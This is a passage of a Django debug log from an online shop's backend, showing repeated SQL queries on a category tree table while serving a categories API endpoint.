"shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:13:41] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:14:43,244 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:14:43,252 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:14:43,259 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:14:43,263 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:14:43,269 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:14:43,273 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:14:43,277 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:14:43,281 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:14:43,285 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:14:43,291 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:14:43,295 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:14:43,300 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:14:43,304 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:14:43,308 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:14:43,314 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:14:43,318 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:14:43,322 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:14:43,326 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:14:43,330 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:14:43,336 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:14:43,341 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:14:43,345 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:14:43,351 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:14:43,356 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:14:43,361 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:14:43,367 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:14:43,373 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:14:43,377 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:14:43,382 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:14:43,386 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:14:43,392 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:14:43,395 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:14:43,399 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:14:43,403 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:14:43,407 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:14:43,414 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:14:43,418 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:14:43,422 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:14:43,428 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:14:43,432 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:14:43,436 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:14:43,441 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:14:43,445 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:14:43,449 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:14:43,455 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:14:43,459 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:14:43] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:15:56,561 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:15:56,574 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:15:56,582 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:15:56,586 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:15:56,592 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:15:56,596 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:15:56,600 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:15:56,604 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:15:56,609 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:15:56,616 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:15:56,620 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:15:56,625 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:15:56,630 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:15:56,634 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:15:56,640 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:15:56,645 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:15:56,649 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:15:56,653 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:15:56,658 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:15:56,664 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:15:56,668 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", 